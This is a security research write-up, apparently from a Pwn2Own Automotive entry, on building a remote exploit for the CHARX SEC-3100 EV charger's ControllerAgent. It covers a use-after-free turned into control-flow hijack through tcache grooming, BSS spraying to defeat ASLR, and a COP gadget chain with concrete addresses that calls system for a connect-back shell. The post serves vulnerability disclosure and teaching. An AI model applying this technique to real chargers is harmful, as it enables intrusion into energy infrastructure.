Our previous post explored some of the bugs we discovered in the CHARX SEC-3100 ControllerAgent service for Pwn2Own Automotive. We’ll now walk through how these bugs were weaponized to produce a fully remote exploit.

We left off with a use-after-free (UAF) primitive. Notably however, the UAF occurs on process teardown (a “one-shot” style bug), and we don’t have any information leaks to easily deal with ASLR (address space layout randomization).

If you want to try exploiting a similar bug on your own, we’ve hosted a challenge with an adapted version of the same bug pattern on our in-browser WarGames platform here.

Traversing a Freed List

To recap, the C++ destructor ordering bug from the first post results in a UAF during object destruction, which occurs within exit handlers during process teardown. We initiate the exit handlers with a null dereference bug (which triggers a signal handler calling exit). A half-destructed object holds a freed std::list, which is then iterated over to find a list node entry with a specific ID.

More specifically, the C++ list contains ClientSession objects, and the intent of the list iteration is to find the session to shut down and clean up. In other words, we are traversing a freed list.

The C++ standard library implements std::list as a linked list, where each node has next / prev pointers followed by the data type inlined:

std::list<T> {
    std::list_node<T>* head;
    std::list_node<T>* tail;
}

std::list_node<T> {
    std::list_node<T>* next;
    std::list_node<T>* prev;
    T val;
}

In the case of ClientSession, the nodes look like this, having size 0x60:

The list destructor iterates over each node, starting at the head, and calls delete on each one. However, for the list “root” itself, it leaves the head / tail pointers alone (i.e. pointing at free memory). Clearing them would be unnecessary, as a destructed list is invalid anyway.

After the list is destructed, the ClientConnectionManagerTcp destructor ends up notifying the ControllerAgent to invalidate a connection ID. The invalidation function iterates over the (now-destructed) list, looking for the session with matching connection ID.

The pseudocode for the list traversal looks something like this:

void ControllerAgent::on_client_removed() {
    // client_sessions list already destructed! cur pointing at now-freed first list node
    std::list_node<ClientSession>* cur = this->client_sessions.head;

    while (cur != &this->client_sessions) {
        if (cur->m_isConnectionAssigned
                && m_clientConnection->vtable->get_connection_id() == <expected ID>) {
            // unassign the connection ...
            break;
        }
        cur = cur->next;
    }
}


Assuming we can control a node along this traversal, we can easily hijack control flow with the virtual call to get_connection_id.

Controlling a List Node

To understand how we can control a node, consider the now-freed head of the list, at which the list traversal starts. When this node is freed during the list destructor, the chunk will have a size class of 0x68, and will be placed into the tcache bin of that size. Fully understanding glibc tcache internals isn’t necessary here; it suffices to say that a tcache bin is just a singly-linked list of free chunks of the same size, where the next pointer is placed at offset 0 in the free chunk.

So when the head node is freed, the allocator will essentially do

p->next = tcache_bin->head;
tcache_bin->head = p;

Conveniently, the next pointer from the tcache’s perspective is in the same location as the next pointer for the std::list_node. This pointer will be overwritten with whatever is currently the head of the tcache bin, while the remaining contents remain untouched (technically a tcache “key” will also be written at offset 8, which overlaps the prev pointer, which we don’t care about).

To sum up, when triggering the UAF list traversal above, the first node will be the mostly-untouched now-freed head of the list, while the remaining iterations will be traversing the tcache bin.

It now becomes clear that controlling a list node comes down to two things:

  • ensuring the head list node is not “assigned” so the list traversal continues to the 2nd “node” (really a tcache chunk)
  • placing something in the tcache prior to the std::list<ClientSession> destructor, so we control the 2nd “node”

The first point is simply logistical in nature. We can connect two clients, then disconnect the first to unassign the session, then finally use the null deref to trigger the exit-handler UAF.

Populating the Tcache

We’ve mentioned briefly that there’s a configAccess operation supported by the JSON TCP messaging. This operation provides read/write access to a small set of configuration variables.

Internally, the variables are managed by a ConfigurationManager (a sub-struct of the monolithic ControllerAgent), and are stored as pairs of std::string. Setting these string variables provides a very convenient allocation primitive, and the strings will be freed during the ConfigurationManager destructor, which occurs prior to the list destructor.

The only obstacle to overcome is that normally, the configuration strings can’t contain null bytes… A useful trick for dealing with this is realizing that assigning new values to a std::string does not necessarily cause a reallocation.

The standard library implementation will only allocate a new backing store if the current one is too small. Otherwise, the new string will simply get copied into the existing allocation, with a null byte tacked on the end.

For example, with an existing string of AAAA, assigning a new string BB will result in the same allocation being reused, now containing BB\0A.

So far, the general plan of attack is:

  • Set a config value to a string of size 0x60
  • Repeatedly assign smaller strings to embed nulls and construct a fake std::list_node<ClientSession>
  • Trigger null deref => exit handlers / destructors
  • Config string with fake node is freed, placed in tcache
  • The list of sessions is destructed, first node freed into tcache
    • The next pointer becomes whatever was in the tcache, i.e. the fake node
  • UAF list traversal goes to 2nd fake node (the freed config string)
  • Hijacked virtual call from fake node’s m_clientConnection

This leaves one crucial question unanswered: with ASLR, we don’t know where to point the fake m_clientConnection, where gadgets are, etc. There are plenty of large buffers in the BSS (e.g. TCP input) in which to place our fake object, if only we knew where they were in memory.

Without any information leaks on hand, we’ll need to get creative…

ASLR Entropy

As we saw when discovering the UAF, a system monitor / watchdog restarts the controller agent if it exits, so a brute-force approach of guessing the ASLR slide, crashing, and restarting seems like a viable option. The CHARX SEC-3100 runs 32-bit ARM Linux, which only has 8 bits of ASLR randomization by default.

That’s only 256 possible slides, which is relatively brute-forceable.

One caveat is that each iteration could take upwards of 6 seconds, putting the average / expected runtime until successful exploitation over 25 minutes… a bit too long for comfort. Instead of naively brute-forcing ASLR, we can do much better.

ASLR “Bypass”: BSS Spraying

A noticeable feature of the controller agent binary was how massive its BSS segment was, roughly 0x1b3000 bytes, or 435 pages. This invited the idea that we could place multiple fake objects in various pages at the same page offset, such that if any of the payloads ended up at the correct address, the exploit would succeed.

To illustrate, imagine if we had fake objects at un-slid addresses 0x1040 and 0x2040, then guessed address 0x2040 as the pointer in our fake list node. This guess would work both with an ASLR slide of 0 or 0x1000. This alone would double the probability of success. With n fake objects, the probability becomes n / 256.

The next logical step is to find some large structure(s) in the BSS that can hold these fake objects.

Closer inspection revealed that over 80% of the BSS belonged to a structure V2GMessageReqMsg, with a size of over 0x167000 bytes. This structure holds the most recently parsed TCP JSON message with operation v2gMessage. So how much of this structure can we control?

Populating the V2G Structure

V2G (vehicle-to-grid) is a protocol related to electric vehicles selling power back to the grid, and the JSON messaging expects keys like salesTariff and consumptionCost. This structure contains several arrays within sub-structures, which in turn contain other arrays. These nested arrays explain the structure’s large size.

Since this structure is intended to be populated from user input (over TCP), many of the fields can be controlled. However, each fake object must use controllable fields all at the same page offset, which introduces significant constraints. The sub-structures are not of an aligned size, so an easily controllable field in one page may be impossible to control in the next page. Similarly, 8 bytes may be controlled in one page, but only 4 in others, etc.

To relax the constraints somewhat, we’ll have fake objects of only 4 bytes. In other words, each fake object is solely a vtable. Each of these vtables could then point into unconstrained “raw” buffers for TCP / UDP / HomePlug packet input.

Accommodating these constraints means only being able to use certain fields for our V2G JSON input message. We end up crafting a message looking something like the JSON blob below, where the {"": 0} objects are padding to advance to the next page:

In this way, we were able to populate fake objects in 83 pages, accounting for 83 of the 256 possible ASLR slides. That gives our exploit a probability close to 1 in 3 for bypassing ASLR, a huge improvement over a naive brute force of 1 in 256.

The V2G messaging required some other initialization to take place after program startup, so each brute force iteration takes longer waiting for setup to complete, resulting in ~15 seconds per iteration. That said, the enhanced probability is well worth the per-iteration slowdown.

COP Chain

The increased probability of having our fake object at the guessed address is great, but we’ve also restricted ourselves to a fake object with just a vtable and no additional payload. Our primitive has evolved from a simple UAF into an arbitrary virtual call, but with only 4 controlled bytes at the “this” argument.

To turn this into full code execution, we’ll use a sequence of COP (call-oriented programming) gadgets, to eventually achieve an arbitrary call with an arbitrary argument.

We start with control of r0 and the 4 bytes within (the vtable of the fake object). We jump into the following gadget (where we really only care about the highlighted instructions):

0x498148:    mov     r4, r0
0x49814a:    ldr     r7, [r0, #0]
0x49814c:    mov     r5, r1
0x49814e:    mov     r6, r2
0x498150:    mov     r1, r3
0x498152:    ldr     r2, [sp, #24]
0x498154:    ldr     r3, [r7, #20]
0x498156:    blx     r3


This gadget essentially does mov r4, r0, then transfers control to a different vtable function (the next gadget). This next gadget will be:

0x4a32ea:    ldr     r0, [r4, #0]
0x4a32ec:    ldr     r3, [r0, #0]
0x4a32ee:    ldr     r3, [r3, #8]
0x4a32f0:    blx     r3


This gadget dereferences r4, and treats the value as a C++ object, dispatching a virtual call. In combination with the previous gadget, we’ve essentially done a simple dereference r0 = *r0.

Crucially, this will treat what was previously the fake vtable, as a full-blown 2nd fake object. Since this 2nd fake object will be in an unconstrained buffer, we now have an arbitrary virtual call with a fully-controlled “this” argument (containing arbitrary fields).

From here, we’ll trigger the mov r4, r0 gadget once more, before jumping into our final gadget, which is part of a function that loops over an array of function pointer / argument pairs. The gadget is a bit longer, but we’ve highlighted the path from r4 control to the function pointer invocation:

0x458d12:    ldrh    r1, [r4, #8]
0x458d14:    ldr     r3, [r4, #4]
0x458d16:    ldr     r4, [sp, #0]
0x458d18:    cbnz    r1, 0x458d24
0x458d1a:    b.n     0x458d06
0x458d1c:    subs    r1, #1
0x458d1e:    add.w   r3, r3, #16
0x458d22:    beq.n   0x458d06
0x458d24:    ldrd    r2, r0, [r3]
0x458d28:    eors    r2, r4
0x458d2a:    tst     r2, r0
0x458d2c:    bne.n   0x458d1c
0x458d2e:    ldr     r2, [r3, #12]
0x458d30:    cmp     r2, #0
0x458d32:    beq.n   0x458d06
0x458d34:    ldr     r0, [r3, #8]
0x458d36:    mov     r1, r6
0x458d38:    blx     r2


We end up with an arbitrary call with an arbitrary first argument, which we can simply direct to system (which is already present in the PLT) to spawn a connect-back shell.

To sum up the COP chain:

  • “bootstrap” from fake vtable into fully-controlled 2nd fake object, using r0 = *r0 gadget pair
    • mov r4, r0 gadget followed by
    • ldr r0, [r4] gadget
  • call system using gadget accepting function pointer / argument structure
    • mov r4, r0 gives r4 control
    • next gadget fetches function pointer / argument from r4

Constructing Fake Objects

We have a path from fake 4-byte object to 2nd fake object to system, but it is worth noting that each of these 2nd fake objects must exist separately, one for each ASLR slide. Each 2nd fake object must have different vtable pointers, gadget addresses, commandline-for-system string argument addresses, etc…

The 2nd fake objects will be spread out across 3 “raw” buffers:

  • TCP input
  • UDP broadcast input
  • HomePlug packet input

The received UDP input and HomePlug packets are completely raw, but the TCP buffer undergoes some string processing, namely the messages are newline-delimited. This is not fundamentally restrictive, but requires additional iterations to embed null bytes (similar to the std::string behavior), and the payload can’t contain newlines.

With all the payloads in place, we end up with something conceptually like this:

Depending on the ASLR slide, only one (or none) of the fake object pairs will actually be at the right addresses, so only one set of arrows shown would be valid at once.

Putting Everything Together

With a strategy defined, implementing the exploit becomes wrapping everything in the necessary brute force logic.

To recap the exploit flow in one place, we perform the following steps in a loop:

  1. Wait for the agent to perform V2G-prerequisite initialization
  2. Use a config value std::string to craft a fake list node
  3. Populate V2GMessageReqMsg in the BSS with many fake objects
    • each is at the same page offset, and only 4 bytes for a vtable
    • each vtable points at a 2nd fake object in a raw buffer
  4. Populate raw BSS buffers with 2nd fake objects (TCP / UDP / HomePlug packets)
  5. Trigger HomePlug null deref to kick off exit handlers (ControllerAgent destructor)
  6. Config value with fake list node is freed into tcache
  7. List destructor frees list nodes
    • head node’s next pointer overwritten with next tcache pointer, the fake list node
  8. ClientConnectionManagerTcp destructor ends up invoking UAF list traversal
    • UAF list traversal uses guessed fake object pointer in crafted fake list node
  9. Hijacked virtual call on guessed fake object address
    • if ASLR slide was accounted for, address will be valid, otherwise will crash
    • enter COP chain invoking system
  10. Check for connect-back shell, otherwise wait for service to restart and repeat

With the BSS spray technique giving an 83 in 256 probability of success, and roughly 15 seconds required for each iteration attempt, the average / expected runtime for the exploit is under a minute.

For reference, you can find the full exploit code here.